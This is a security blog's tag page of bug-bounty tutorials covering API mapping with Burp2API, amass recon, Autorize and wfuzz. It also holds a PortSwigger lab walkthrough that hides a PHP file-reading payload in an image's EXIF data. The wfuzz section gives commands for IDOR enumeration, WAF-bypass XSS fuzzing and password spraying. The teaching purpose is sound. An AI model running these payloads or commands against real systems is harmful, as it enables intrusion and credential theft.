Tag: bug bounty

  • Reverse Engineering APIs with Burp2API

    Reverse Engineering APIs with Burp2API

    Postman is one of my favorite tools for testing the functionality and security of APIs. It allows you to organize API routes neatly and write/run automated tests across collections of requests.

    If you have access to the API spec of an application you are testing, you can easily import the mapped API directly into Postman in a structured fashion.

    But not all APIs have public spec files or even documentation. Sometimes, we have to fly a little blind.

    Well, not completely blind. We can use a proxy to capture the requests that form the API.

    The Process

    There are many proxies to choose. From the CLI tool mitmproxy to the feature-packed hacking tool, Burpsuite. It doesn’t matter which one you choose; they all serve the same purpose: capturing web traffic.

    The tricky part is getting that captured data into Postman in an organized fashion.

    Postman does have a proxy built in, which, although convenient, doesn’t organize the routes the way importing API spec would.

    I used to use a technique I learned in APIsec University’s API Pentesting Course that involved using mitmproxy to capture the traffic, then mitmproxy2swagger to turn the captured data into API spec.

    This worked well, but I’m not the biggest fan of mitmproxy. I like using Burpsuite to manage my testing and found myself flipping back and forth between them.

    I then stumbled upon this Burp extension that exported selected requests into a Postman collection format. But it didn’t do any formatting or structuring.

    There had to be a better way…

    Enter Burp2API

    Then, while I was thinking about developing my own tool, I stumbled upon this little gem: Burp2API. It’s a Python script that converts exported requests from Burpsuite into the OpenAPI spec format.

    My prayers had been answered!

    It’s basically mitmproxy2swagger but with the added benefit of not being dependent on mitmproxy.

    Why not just use mitmproxy?

    Don’t get me wrong, mitmproxy is a great tool, and I’m sure you CLI cronies out there swear by it. But there are numerous benefits to using Burpsuite over it.

    Firstly, it’s great for project management. You can specify a scope, make observations with Burp Organizer, and track any issues Burp automatically identifies.

    Secondly (and probably the most important), you have automated mapping capabilities. You can use Burp to scan and crawl to find endpoints you may miss by relying on manual browsing alone.

    Lastly, as a pentester, you will undoubtedly go back to Burp after your initial exploration phase. So, why not just stay there? That way, you can keep all of your gathered traffic in one place for more convenient analysis later.

    At the end of the day, we’re hackers. It makes sense to use the best tool for the job.

    I’m also big on simplicity. So, if I can get the same or better results using fewer tools, that’s a win for me. Plus, I’d rather be an expert with a few tools than skim the surface with many.

    Reverse Engineering crAPI

    For demonstration purposes, I’ll be using OWASP’s crAPI. crAPI is an intentionally vulnerable API. I love it because it’s built with a modern front end, making it feel more realistic.

    I highly recommend sharpening your skills with crAPI. As a realistic target, it allows you to practice the hacker mindset, rather than just regurgitating the exact steps you need to follow to solve a level in a CTF-like environment.

    So, let’s put our hacking caps on and dive in!

    Step 1: Manually gathering traffic

    The first step in our reverse engineering journey involves browsing the application as a normal user might. Nothing too glamorous.

    However, we’ll be running Burpsuite in the background so we can get a more in-depth look at how the application is working behind the scenes.

    I’m not going to go in-depth about how to set up Burp as a proxy, so here’s an article on that.

    The goal here is to cover every function of the app:

    • Signing in
    • Uploading profile pictures
    • Buying products
    • Commenting on posts
    • Resetting the account password

    Whatever the app allows us to do, we’re going to do.

    Remember, we’re not looking to break anything just yet, but don’t let that stop you from thinking about potential attack vectors while getting to know the app.

    Just by creating an account and signing into crAPI, I’m able to get an idea of how the API is structured:

    I’ve heard the argument that you should spend a ton of time getting to know the target application before you even fire up any hacking tools. While I partially agree with this sentiment, I believe that you should always have Burp running in the background as soon as you start browsing the app.

    You may capture requests or find some functionality that you would miss if you do a second pass with Burpsuite. Plus, Burpsuite passively scans captured traffic, so the more data, the better.

    Step 2: Discover more routes

    After exhausting manual exploration, it’s time to let Burp take the reins. There are a couple of ways that we can do this within Burp:

    1. Using a scan to crawl the application
    2. Using extensions

    Launching a scan with Burp

    To use Burp’s scanning capabilities, go to the Dashboard and click the New scan button:

    A window will pop up, asking us to choose a scan type. For our purposes (discovering more routes), I’ll select the Crawl option:

    The other two options actively scan the target, which is noisier and will take longer. I highly recommend exploring those, but be wary that a WAF would most likely start blocking your traffic (or more annoyingly, ban your IP) if you get too noisy.

    Next, add a list of URLs to scan.

    I’m skipping the scan and Resource pool configuration for simplicity. So, the last item we’ll configure is the Application login section. I’ll add my login credentials here:

    This allows the crawler to use the specified credentials whenever it finds a login form. Burp will be able to travel deeper into the application this way.

    Without filling this out, it would just crawl the login page.

    Now, we’ll hit the “Scan” button and let Burp explore the app for us.

    Once the crawl finished, the summary page revealed that it found some new routes:

    Burp even handily adds these to our Sitemap for us. How cool!

    Using JSLinkFinder

    Burpsuite’s crawler is just one tool we can use to discover more endpoints.

    Instead of crawling the site, we can also parse the JavaScript for links using JSLinkFinder.

    JSLinkFinder passively parses JS responses, so it most likely gathered links during the manual exploration phase. But, for demo purposes, I’ll show you how to trigger it incase it didn’t.

    In the Proxy’s History tab, select the JavaScript responses, right click them, then select Do a passive scan:

    We can see that JSLinkFinder found some links in the BurpJSLinkFinder tab:

    These will be automatically added to our sitemap. Unfortunately, since these are all out of scope, they won’t be of much use to us. But, it’s always good to explore options.

    Now that we collected routes manually and automatically, it’s on to phase 3!

    Step 3: Export the endpoints

    I like to use the Sitemap in the Target tab when exporting API requests. It gives me a structured look at the API.

    From the manual phase, we know that the crAPI API endpoints all contain api in the URL. We can filter the site map to get a more refined look at the API:

    Much better. This is exactly what I want to be reflected in Postman:

    To export the API routes, all we need to do now is right-click on the top-level URL and select Save selected items:

    Save the file in a convenient location.

    Note: There is an option to encode the requests/response data in base64. You can leave that on. Bupr2API does the decoding for us.

    Now, we can leave Burp and head over to the command line.

    Step 4: Converting to API spec

    Finally, it’s time to use burp2api!

    It’s as easy as running the python script and supplying the file as an argument:

    $ burp2api.py crapi-api.req
    Output saved to output/crapi-api.req.json
    Modified XML saved to crapi-api.req_modified.xml

    The output is saved in an output directory along with a second file. I moved the JSON file out of there and renamed it for convenience’s sake:

    cp output/crapi-api.req.json ../crapi-api-spec.json

    Now, we can upload it to the online swagger editor just like any old spec file:

    So simple and cool!

    Now it’s time to import this into Postman:

    Step 5: Importing to Postman

    Open up Postman in a fresh workspace. Then, click the Import button at the top.

    You can also just drag and drop the file anywhere in the window:

    When prompted, choose the option to import as OpenAPI 3.0:

    And finally, click Import.

    Now, you should have a beautifully organized mapping of the API in Postman:

    Why not just stay in Burpsuite?

    You may be wondering why we went through the effort of migrating to Postman when we had all the data we needed in Burp structured exactly the way we wanted.

    Ok, you might not have, but I’ll explain the method to my madness anyways.

    This method of reverse engineering is great for when you are running continuous, structured security tests on a single API.

    For example, at my job, the application I am testing makes use of an internal API. This API doesn’t have documentation or a spec file, so I would need to reverse engineer it to get the structure mapped out.

    As a Quality Engineer, I need to continuously test the API to make sure that changes don’t introduce bugs or security flaws during each development cycle. Postman is great for automating this process as I can write automated tests, then run them on a nightly basis using a cron-job to ensure stability.

    If you’re a pentester or bug bounty hunter, it may be more worth your time to just stay in Burp as you’re not likely going to be monitoring the API for the long-term.

    In short, make sure you understand the context of your testing and choose what works best for you.

    Conclusion

    I hope you gained something from reading this!

    This is typically the method I use for mapping as well as reverse-engineering APIs. So, you kind of got a two-for-one deal in this post!

    I personally like this better than the mitmproxy -> mitmproxy2swagger approach. It’s simpler and removes my dependency on mitmproxy. Fewer tools, yay!

    Please try this out for yourself against crAPI. Reading this post once and forgetting about it isn’t going to make you a better tester.

    So, practice, practice, PRACTICE!

    I also recommend you read Portswigger’s documentation on Burpsuite (even if you’re already familiar with the tool). The part walking through the pentest workflow using Burpsuite is highly valuable.

    Also, explore the courses in APISec University if you’re new or even an intermediate web/API hacker.

    Both of these resources are FREE so take advantage of them.

    I wish you the best on your security journey! Keep learning!

  • Practical amass – How I configure and use amass in my recon flow

    Practical amass – How I configure and use amass in my recon flow

    If you’re into recon, you’ve probably heard of amass. It’s a powerful tool for mapping attack surfaces during bug bounty hunting or penetration testing. Here’s why I love it:

    • It’s close to an all-in-one recon tool.
    • It aggregates data from multiple resources (DNS, ASN, Whois, etc.).
    • Its capabilities can be extended with API keys.
    • It stores all data in a SQLite database, making information management and querying easier than relying on text files.

    Instead of repeating what’s already in the official tutorial, I’ll take you through how I use Amass in my bug bounty recon workflow.

    Global Configuration

    Once you install amass, the first step is setting up its configuration files. For me, these live in:

    ~/.config/amass/

    Then in here, I did the following:

    1. Create the Required Files:

    1. datasources.yaml: Stores API keys.
    2. config.yaml: Default configuration file.

    2. Set Up Datasources

    Run the following to see which sources need configuring:

     amass enum -list

    Any source marked with a star requires an API key. Register for as many free resources as possible to maximize Amass’s capabilities. For example, my datasources.yaml file contains:

    datasources:
      - name: Shodan
        creds:
          account:
            apikey: "<key>"
      - name: VirusTotal
        creds:
          account:
            apikey: "<key>"
      - name: SecurityTrails
        creds:
          account:
            apikey: "<key>"
    global_options:
      minimum_ttl: 1440

    3. Link Datasources to the Configuration

    Use config.yaml to reference your datasources file:

    options:
      datasources: <PATH TO>/.config/amass/datasources.yaml

    For a basic setup, this configuration is enough. You can explore more customization options in the OWASP Amass project.

    Workspace Setup

    Before I start working on a program, I create a directory for all of my program-specific work:

    ~/bounties/<program-name>/recon/amass

    This is where I would store amass outputs, configuration files, and databases.

    Project-Specific Configuration

    In the amass directory, I maintain a separate config.yaml tailored to the specific program:

    scope:
      domains:
        - example.com
        - example1.com
      ips:
        - 127.0.0.1
      asns:
        - 1234
      blacklist:
        - sensitive.example.com
    options:
      timeout: 5
    

    This keeps Amass focused on the program’s defined scope and prevents unnecessary noise. You can point amass to this project-specific configuration file with the -config flag.

    Root Domain Discovery

    If you’re starting with ASNs, IP ranges, or an organization’s name, the intel command helps find root domains to target:

    amass intel -asn 16839 -dir amass -config recon/config.yaml

    Or, if you already have a domain and want to expand the attack surface:

    amass intel -whois -d example.com -dir amass -config recon/config.yaml

    This performs a reverse whois lookup, gathering related domains.

    Subdomain Discovery

    Once you’ve identified root domains, it’s time to dig deeper with enum:

    amass enum -d example.com -dir amass -config recon/config.yaml

    This will map out subdomains for further analysis.

    By default, amass enum runs passively, meaning it relies solely on 3rd parties for the information. You can use the active flag to tell it to directly interact with the target for (potentially) more results and increased accuracy:

    amass enum -active -d example.com -dir amass -config recon/config.yaml

    This will likely take longer to run than the passive option. I recommend starting with passive then circling back to active once you’ve exhausted your exploitation efforts.

    It’s also worth noting that amass has capabilities for performing subdomain brute-forcing. One useful option being a hashcat-like masking option. I’ll leave that for you to explore in the official tutorial.

    Parsing Gathered Domains

    amass organizes all data in a SQLite database stored in the directory specified by the -dir flag. Using sqlite3, you can query and manage the data:

    $ sqlite3 amass.sqlite
    sqlite> .tables
    assets           gorp_migrations  relations
    

    The assets table is the most relevant, categorizing data into types like FQDN, IPAddress, ASN, and more.

    An example query to extract recent IPv4 addresses:

    SELECT content -> 'address'
    FROM assets 
    WHERE type = 'IPAddress' 
    AND json_extract(content, '$.type') = 'IPv4' 
    ORDER BY last_seen DESC 
    LIMIT 10;
    

    As you can see, using sqlite as the DBM makes it easy to pull exactly what you need and plug it into other tools.

    Why SQLite Beats Legacy Features

    Older versions of Amass supported amass db for queries and amass viz for visualization. While those features were neat, I prefer direct database queries. They give you more control and are easy to script for repeated workflows.

    For example, you could write a script to export all gathered domains and IPs into separate files for further analysis.

    Also, the viz feature doesn’t add much value in my opinion. For me, visualizing massive amounts of data would be more overwhelming than useful.

    I’d much rather pull only what stands out to me and throw it in a mind-mapping tool (like xmind). That way, I can work in a less cluttered environment.

    Conclusion

    amass is a game-changer for recon workflows. While setting up API keys may cost some time (and occasionally money), it’s an investment that will give you an edge in bug bounty programs.

    I highly encourage you to experiment with this tool, tweak configurations, and build scripts to fit your needs.

    Happy hunting!

  • Remote code execution via polyglot web shell upload – Portswigger Web Security Academy Lab Walkthrough

    Remote code execution via polyglot web shell upload – Portswigger Web Security Academy Lab Walkthrough

    In this lab, we will bypass simple file validation to upload PHP code. I found this lab particularly interesting because the bypass involved injecting code into an image’s metadata. This is a technique I was unfamiliar with before attempting to solve this lab and I thought it was pretty cool. So, let’s get into my thought process for solving this lab!

    The task at hand

    The description of the lab is as follows:

    “This lab contains a vulnerable image upload function. Although it checks the contents of the file to verify that it is a genuine image, it is still possible to upload and execute server-side code. To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the contents of the file /home/carlos/secret. Submit this secret using the button provided in the lab banner. You can log in to your own account using the following credentials: wiener:peter

    In the directions, we’re given the hint that the code validates an image based on its contents. The first thing that came to mind was changing the magic bytes of my PHP web shell to pass it off as an image. So, I set out to do just that!

    Magic Bytes

    Magic Bytes are file signatures used to identify files. They are used in UNIX-based operating systems to distinguish different file types from each other. Operating systems need to know this because different file types need to be handled differently. For example, an image file must be treated differently than an executable file. Windows, on the other hand, relies on file extension names instead.

    So, if the server that is doing the file validation is running Linux, we might be able to trick it into thinking that our PHP file is an image by changing the leading bytes.

    Let’s craft the payload!

    Since we’re given the directory of the secret, my PHP code just outputs the file’s contents to the browser. For convenience’s sake, it’s not a full-blown web shell:

    <?php
    $file = '/home/carlos/secret';
    $contents = file_get_contents($file);
    echo $contents;
    ?>

    I have it saved as webshell.php (super low profile). Using the file command in my terminal, we can see that it gets recognized as a text file with PHP code written in it:

    Even after we change the extension, it’s still recognized as a PHP script. Magic Bytes!

    Let’s see what happens when we change the leading bytes of the file to the file signature of a JPEG.

    First, let’s use xxd to see what the original bytes look like:

    For this to be recognized as a JPEG, we’ll have to change the leading bytes to FF D8 FF E0. I got that magic number from this wiki article.

    To edit the file, I’m going to use a tool called hexedit. Before editing, I’ll add a few new lines to preserve the original code (4 to be exact because the signature is 4 bytes):

    Now, after saving, the file should be recognized as a JPEG:

    Just like magic!

    Logging into our lab’s account with wiener:peter, we are met with an option to upload an avatar image. Proxying my traffic with Burp, I try to upload the web shell:

    No dice! Looks like the file checker doesn’t just check file’s signature…

    Enter EXIF!

    We need to find another way to pass our PHP code off as an image file. My second thought was to somehow inject the PHP code into a valid image instead of trying to make my PHP file mimic an image.

    A quick Google search on “injecting PHP code into an image” lead me to this excellent article. Apparently, code written into the metadata of an image can be executed!

    If you don’t know what EXIF data is, it’s basically metadata, or extra data written to an image to provide information about the context of the image. This can include the device used to snap the photo, the resolution, and even more revealing information like the location the image was taken.

    For this reason, examining EXIF data is a powerful recon technique. Let’s take a look at an example of a random picture I downloaded online:

    This information is not only readable but writeable as well.

    We can add comments in the metadata with a tool called jhead. Using the command jhead -ce <image>, we can edit the EXIF comment field:

    Saving this, our metadata now stores our PHP code in the comment section of the metadata:

    This has no impact on the integrity of the file and will bypass most image upload checks:

    The only caveat is that most servers aren’t configured to execute image files (makes sense). So, in order for the code to run, we’ll have to change the filename to have a .php extension.

    Success!

    Inspecting the uploaded image with dev tools tells us where the file was uploaded to:

    Browsing to this location gives us the secret! Of course, I’m not going to show this to you. You’ll have to take my word for it and solve the lab on your own 😉

    Conclusion

    Solving this lab helped me to learn a powerful code smuggling technique. This method should be flexible and open a world of possibilities for you. I can only imagine trying this with other languages like Javascript for stored XSS.

    Of course, this would only work if the server doesn’t validate files based on their extension. There are workarounds to bypass this even in the event that the server does make this check (like exploiting a race condition) so it is up to you to get creative with this and find some critical bugs.

    Anyways, thanks for reading! I hope you learned something because I certainly have! Until next time 🙂

  • Make access control bug discovery fast and easy with Autorize

    Make access control bug discovery fast and easy with Autorize

    We’re back from our slight detour to swing back into web app testing! Don’t worry though, I haven’t given up on wireless stuff. More content for that coming soon!

    In this post, I’m going to walk through a demo that makes use of my favorite Burpsuite extension: Autorize. Autorize is a plugin that makes testing for access control vulnerabilities easy. You can just let it run in the background as you peruse the web app you’re testing and it will tell you what can be bypassed automagically!

    So, let’s jump right into the demo.

    Installing Autorize

    Autorize doesn’t come with Burp by default. To use it’s magical powers, we’re going to have to install it ourselves. Luckily Burpsuite makes this super easy for us by hosting it on the BAppstore. You can find the BAppstore under the extensions tab. Then a simple search for “Autorize” will pull it right up for you:

    Then just click the orange “Install” button to install it. My button says “Reinstall” because I already have it all setup.

    If you have a greyed out button, you’ll need to install and configure Jython because Burpsuite is a Java tool and Autorize is written in Python. To do that, you can download the Jython standalone here. Then, just go to the “Extensions settings” under the “Extensions” tab and add the location of your Jython standalone JAR file like so:

    And now you should be able to run Autorize!

    Demo Time

    For demonstration purposes, I’m going to be testing an instance of OWASP Juiceshop running locally. If you haven’t heard of it, Juiceshop is a web app built with modern web technologies designed to be intentionally vulnerable so that you can practice what you’ve learned. It also has a ton of guided walk-throughs so I highly recommend trying it out if you want to get into web penetration testing.

    Ok, let’s get started. To run Autorize, we’re going to have to be running Burpsuite and have it proxy our web traffic (no surprise there). For Autorize to be able to auto-magically test for Authorization bugs, it needs whatever headers the web app uses for authentication.

    I went ahead and created two accounts for testing: sambamsam1@gmail.com and sambamsam2@gmail.com. To start, I’ll login in with sambamsam1 and grab the header I need to copy over to Autorize:

    OWASP Juice shop uses Bearer Tokens to authenticate, so I copied the entire Authorization header. Then, over in the new Authorize tab, you can just paste it in:

    And that’s all you need to set up Autorize. Pretty simple really. I like to add some filters to the list to make things easier for me. One of the filters I set up on every run is the “Scope items only” filter. This is essential if you’re testing on a Bug Bounty Program.

    Additionally, I like to add a “URL contains” filter (you can select them from the drop down then add content if needed), if I’m targeting a specific domain or endpoint. If I’m testing an API that makes excessive use of OPTIONS requests, there’s an option to filter those out too.

    Once you’ve got that all setup, logout and log back in as another user (in my case, sambamsam2) and you’re good to go! Click the “Autorize is off” button at the top and it will turn bright blue to indicate that everything is running.

    Now, all you have to do is browse the application like a user normally would. In this example, I added an item to my shopping cart as my sambamsam2 user.

    Popping back over to the Autorize tab, you’ll see a ton of requests pile up:

    The two columns with all the colors tell us if the authentication was bypassed with the temporary header (our other user’s authentication) or without any authentication at all. A lot of these requests aren’t of any interest to us. However, request 4 stood out to me because it seemed to have a simple numerical ID associated with it and seems to be accessible by our other user.

    We can right-click the request and send it to the Repeater (or Ctrl+R) for a closer look.

    In the Repeater tab, we can verify that the request is successfully being sent with the authorization token of our logged out user:

    And it looks like any logged in user can access other user’s shopping cart just by adding the correct ID to the URL. This vulnerability is known as an Insecure Direct Object Reference (IDOR) and can vary in severity depending on the predictability of the ID and the confidentiality of the data. In our case, items in a users shopping cart isn’t as revealing as a user’s address or social security number, but a numberic ID in the single-digits can be easily guessed, making this a bug of medium severity.

    I used jwt_tool in my terminal window to verify that the JWT Token in the request belonged to my other user, sambamsam1. jwt_tool is great for disecting JWT’s conveniently but it can also be used for exploiting the technology behind JWT’s. Maybe I’ll have to do a tutorial on that…

    Conlcusion

    As you can hopefully see, Autorize makes testing for Authentication vulnerabilities extremely easy. With Autorize, all you have to do is casually browse the application while it runs in the background.

    I used to have to go back and copy headers to every request I thought was interesting and resend the request every time I wanted to verify an IDOR or some other similar vulnerability. Now I can let it run while I explore or do other testing. Just don’t forget to check back every once in a while or you’ll have tons of requests to dig through.

    Autorize helped me find my first paid bug, which used a privilege escalation to perform IDORs. I found a JWT that seemed to belong to an admin user and used Autorize to see what it allowed me to have access to.

    Hope you add this tool to your arsenal and it helps you as much as I do! Stay tuned for more hacking tutorials coming soon!

  • Harnessing the power of wfuzz for web hacking

    Harnessing the power of wfuzz for web hacking

    In today’s post, I’ll introduce you to a tool that should be a part of every bug hunter’s toolkit, wfuzz! I use wfuzz in every bug bounty program I participate in. If you don’t know what wfuzz is, it’s a web application fuzzer. And if you haven’t heard of a web application fuzzer, they’re a type of tool that automates web requests.

    As you’ll see in this post, fuzzers are a simple yet extremely powerful tool and by the end of this reading you’ll be able to confidently use wfuzz, one of the best in the game!

    Practical Examples

    Instead of teaching you the syntax, I’m going to run you through a series of hypothetical, real-world examples so you can use it in your next pentest or bug hunt.

    For simplicity, I’m going to use a popular repository of wordlists called SecLists. These wordlists were put together by a few well-known security professionals including Daniel Miessler and Jason Haddix. I highly recommend you check out the repo and get familiar with what’s in some of the lists.

    Directory Discovery

    Discovering hidden files or directories of a web application can be a gold mine for security testers. wfuzz makes this a snap by fuzzing the target url:

    wfuzz -c -w raft-small-directories-lowercase.txt -u "https://example.com/FUZZ"

    Let’s break this down:

    • -c, colored output to make output easier to read
    • -w, the specified wordlist
    • -u, the url to fuzz

    You might have noticed the word FUZZ in the URL. This is the keyword that tells wfuzz where to fuzz, or supply all the lines from the wordlist.

    In this example, the output would look something like this:

    ********************************************************
    * Wfuzz 2.4.5 - The Web Fuzzer                         *
    ********************************************************
    
    Target: https://example.com/FUZZ
    Total requests: 20116
    
    ===================================================================
    ID           Response   Lines    Word     Chars       Payload
    ===================================================================
    
    000000007:   404        0 L      0 W      0 Ch        "cache"
    000000008:   200        0 L      0 W      0 Ch        "media"
    000000009:   404        0 L      0 W      0 Ch        "js"
    000000001:   200        0 L      0 W      0 Ch        "cgi-bin"
    000000002:   404        0 L      0 W      0 Ch        "images"
    ...

    As you can see, wfuzz neatly prints out the response code, payload used, as well as the number of lines, words, and characters in the response.

    To make the output a little cleaner, I can filter it based on any of the response attributes, like status code:

    $ wfuzz -c -w raft-small-directories-lowercase.txt -u "https://example.com/FUZZ" --sc 200
    
    ...
    
    000000008:   200        0 L      0 W      0 Ch        "media"
    000000001:   200        0 L      0 W      0 Ch        "cgi-bin"
    ...

    Now all that is shown are responses with status code 200. We can also use use --/sl/sw/sh/ss<number> for only showing responses with a specific number of lines, words, characters or that match a specific regex respectively.

    Alternatively, you can replace --s with --h to hide matches rather than showing them.

    This one-liner can lead to some big finds, including configuration files, admin logins, and much more depending on the wordlist.

    Wordlist Contexts

    A little bit of recon with a tool like wappalyzer can go a long way. Knowing what Content Management System (think WordPress or Drupal), API endpoint locations, etc. can result in more findings.

    For example, if I knew my target was running on top of an Nginx server, I might use a wordlist catered towards default files and directories:

    wfuzz -c -w nginx.txt -u "https://example.com/FUZZ" --sc 200,403

    If you uncovered an API endpoint, you can use a wordlist of common object names (like user, team, admin, etc.):

    wfuzz -c -w /api/objects.txt -u "https://api.example.com/v2/FUZZ" --hl 4037

    Using a wordlist that is right for the situation makes it more likely that you’ll find something interesting. Don’t just blindly use random wordlists and there’s no one wordlist to rule them all!

    Subdomain Bruteforcing

    Finding subdomains is key to expanding your attack surface. More often than not, the most interesting subdomains aren’t found passively.

    wfuzz can fuzz anywhere the FUZZ keyword is located in a request, including in headers.

    To bruteforce subdomains with wfuzz, fuzz in the Host header:

    wfuzz -c -w /Discovery/DNS/deepmagic.com-prefixes-top500.txt -H "Host: FUZZ.example.com" -u "https://example.com"

    While wfuzz is capable, sometimes using a tool that is specifically built for this (like gobuster or amass) might be easier and yield better results.

    IDOR

    wfuzz offers a variety of payloads that can be used to fuzz with, including a list of numbers.

    If I stumbled upon a an id parameter in JSON that used a guessable four digit number, I might fuzz it like so to see if I can access any accounts I don’t own:

    wfuzz -c -z range,0000-9999 -X POST -H "Content-type: application/json" "https://example.com/myaccount" -d '{"id": "FUZZ"}'

    The -z parameter is used to specify a payload type and the payload options. You can see the full list of payload’s with wfuzz -e payloads.

    You might also notice that I changed the method from the default GET to POST with the -X option and added a body to my request with -d. This syntax should be familiar with you if you’ve every used curl before. Another reason why I love wfuzz!

    Injection

    If you’ve ever tested for injection vulnerabilities (like SQLi or command injection) then it is likely that your attempts have been blocked by a WAF (Web Application Firewall). WAFs are all fine and dandy but they’re not perfect.

    It can be useful to fuzz common payloads to see if any might slip through the cracks

    wfuzz -c -w Fuzzing/XSS/XSS-Somdev.txt -u "https://example.com?q=FUZZ" --hc 403

    In this example, I used a Cross-site Scripting (XSS) wordlist to see if any common payloads weren’t blocked. This likely will not lead to a XSS bug right away, but might clue me in on what keywords or encoding methods might allow me to build a working payload.

    If you’re into finding XSS bugs, fuzzing with Portswigger’s XSS Cheat Sheet can help you see what HTML tags and events are permitted so you can get an idea of how to build your own payload.

    Password Spraying

    Database leaks for a specific target can be a great asset when testing login pages, but with thousands of accounts to choose from, it can be hard to find valid credentials. Luckily, wfuzz can do this much faster than we can.

    Password spraying is the act of guessing the password of many different accounts (not just one like in brute-force attacks). To achieve this, you need to tell wfuzz to fuzz in two separate locations each with its own payload like so:

    wfuzz -c -m zip -w users.txt -w passwords.txt -X POST -u "https://example.com" -d "username=FUZZ&password=FUZ2Z" --sc 302

    For fuzzing multiple locations with different payloads, you need to supply FUZ<payload #>Z. In this example FUZZ is associated with users.txt and FUZ2Z with passwords.txt.

    I also supplied an iterator type of zip with the -m argument. The zip iterator type will match each of the payloads to the other, 1-to-1, so it is perfect for password spraying. If you’ve used Burp’s Intruder before, than the zip iterator is just like the Intruder’s Pitchfork attack type.

    We can list the other iterator types with the -e options like we did for payloads.

    Wrapping it all up

    wfuzz does one thing (and only one thing) well: spit out a bunch of requests really fast. It’s up to you to make it an effective hacking too.

    That means choosing the right wordlist for the job. There are tons of wordlists out there for different jobs. Don’t just limit yourself to SecLists. It’s a great wordlist and popular for a reason, but it’s popularity just means that a lot of other hunters are going to be using it too, so you’ll likely stumble across the same bugs they do.

    So, Google around and find wordlists that work for you. Or, better yet, make your own as you hunt!

    Also don’t go fuzzing around unless the program allows it. Sometimes there’s a request delay requirement and other times companies won’t permit the use of automated tools at all. Read the policy carefully! Otherwise, you may end up overwhelming the company’s servers.

    Now, you have most of what you need to unleash the power of wfuzz and hunt more efficiently! Happy hunting!

  • Unveiling my Methodology for Exciting Bug Discoveries and Optimal Results

    Unveiling my Methodology for Exciting Bug Discoveries and Optimal Results

    When I first started getting into bug hunting, I tried to create the perfect methodology by mimicking what the greats were doing. I wanted to do recon and automation like Jason Haddix and become a command line guru like Tom Hudson.

    It was fun learning how to use tons of tools but I quickly became bored. I spent more time waiting for tools to finish running and scrolling through text files containing hundreds of URLs than I did hacking. Then there was the issue of organizing all of the overwhelming amount of information I had gathered. Bug hunting began to feel less fun and more like a chore. I began to get discouraged and doubt that cybersecurity was the right field for me.

    Switching it up

    One day, while I was waiting for amass to wrap up finding everything it could on a program with a massive scope, I decided to poke around on Google to see what I could dig up.

    Right away, I found interesting login pages and older looking pages and began focusing my attention on those. Before I knew it, I was on the path to finding bugs before my scan even finished running! Not only did I find bugs faster this way but I was having fun doing it.

    It finally dawned on me: I wasn’t losing interest in cybersecurity–I was just doing it wrong!

    Keeping it casual

    Through my experience, I realized that I wasn’t a fan of using tools, taking extensive notes, or organizing scans. I loved exploring web applications and noting what I thought was interesting. As a result, my bug hunting methodology reflected just that.

    Recon

    I have the most fun interacting with websites in a more visual manner than what text-based tools have to offer. So, my weapon of choice is Google.

    Google offers a variety of advanced queries that can be used to map web applications and find juicy areas that aren’t regularly found with normal searches. For example, I usually start my recon by finding subdomains with this simple Google dork:

    site:example.com

    Right off the bat, I’ll have some links I can explore to get a feel for what kind of organization I’m dealing with. For more dorks, check out my post about this interesting subject.

    I also like to use other search engines like crt.sh or shodan for more technical detail.

    This method makes recon much more fun for me. I’m almost like a kid in a toy store perusing around endless aisles of fun!

    If I exhaust my Google searches, I’ll try subdomain brute-forcing using wordlists refined with the information I gathered previously. For example, if I stumbled upon some dev or test domains, I may try those domains or similar permutations on other (sub)domains I’ve found. Similarly, I’ll fuzz for hidden directories. Lately, my tools of choice have been gobuster and wfuzz.

    Exploitation

    Once I’ve narrowed down what area of the scope I want to test, I’ll start manually interacting with it.

    Usually, I’ll use mitmproxy to do this. For a command line tool, it has a great interface. Plus, I can save everything I captured to go back to later (can’t do that with Burpsuite Community Edition).

    Whatever I want to test, I can forward over to Burpsuite. I frequently use the Repeater to test requests.

    As you can see, my tool-set is pretty simple. All I need is a proxy (mitmproxy and Burpsuite) and a fuzzer (gobuster and wfuzz). The reason I keep my toolkit relatively small is that tools and vulnerabilities are constantly changing and evolving. There are a tons of tools out there just for testing XSS and new bypasses are being developed everyday. So, whenever I come across something I want to test, I lookup the new ways people break things currently because defense is always evolving.

    This also keeps me from being overwhelmed with having too many tools. It’s hard to keep track of which tools to use when and how. I’m also not overly concerned with brushing up on web app hacking because I learn as I hunt for bugs this way.

    And that’s it!

    I know, pretty underwhelming right? But that’s the point! My methodology may be simple but it’s flexible, which is extremely important in the field of cybersecurity.

    Being simple also makes me a more effective bug hunter as I’m focused on the fun parts instead of making hunting boring. Having fun while hunting for bugs makes me more motivated and following my intuition and curiosity makes me dig deeper into the application to find bugs that automation would normally miss.

    Of course, this is the method that works for me. You might be fine with letting tooling do the heavy lifting. One thing is for sure, though: if you’re not having fun, you’re doing it wrong!

  • How To Reverse Engineer API’s To Boost Your Bug Bounty Workflow

    How To Reverse Engineer API’s To Boost Your Bug Bounty Workflow

    Recently, I’ve been working on APIsec University’s  API Penetration Testing Course, where I’ve learned some invaluable methods of API hacking. One of the coolest things I’ve learned is how to effectively map out an API. So, in this post, I’m going to pass on what I’ve learned to you.

    Why waste time mapping an API?

    To some, bothering to map out the routes of an API can seem like a waste of time. But I assure you, taking the extra time to discover and organize the hidden functionality of an application is well worth the extra effort—and with the method I’m going to teach you, it’ll be a snap!

    Web apps are complex!

    Today’s web content is rapidly becoming pretty advanced. It seems that the need for desktop applications is coming to an end as they are shifting to being hosted on the web. From email clients and note taking apps, to online IDE’s and video game streaming—anything can be done on the web!

    To implement this complex functionality, web applications need an equally complex API. Examining these API’s can quickly get overwhelming. If you only rely on tools like Burpsuite or ZAP, you’ll quickly find yourself drowning in the amount of requests you’ll find. It can also be hard (at least in my experience) to organize these routes in a way that allows you to quickly go back and reexamine important discoveries.

    This complexity is a turn-off for most. I mean who wants to spend time digging through a bunch of messy JSON!?

    APIs are juicy!

    Dealing with confusing API’s is worth it because they are a goldmine for bug hunters.

    All of the functionality of a web application is handled through APIs. Handling user data, logins, storing your Google Docs—it’s all done with the magic of API’s! That’s why I seek them out and that’s why you should too.

    Like I mentioned earlier, API’s are complicated and not super interesting upfront. Most people like to go after what they can see in front of them or what automated scanners can pick up. So, if you’re a bug bounty hunter, interacting with APIs that require authenticated access could be your ticket to some bugs. More often than not, these bugs are going to be critical as APIs often deal with sensitive data.

    So, without further-a-do, let’s get you on the fast-track to exploring APIs!

    My Methodology

    Keep in mind that this is my way of doing things. What works for me may not be the best for you. So, feel free to follow my advice as loosely (or closely) as you want!

    Having a click-around

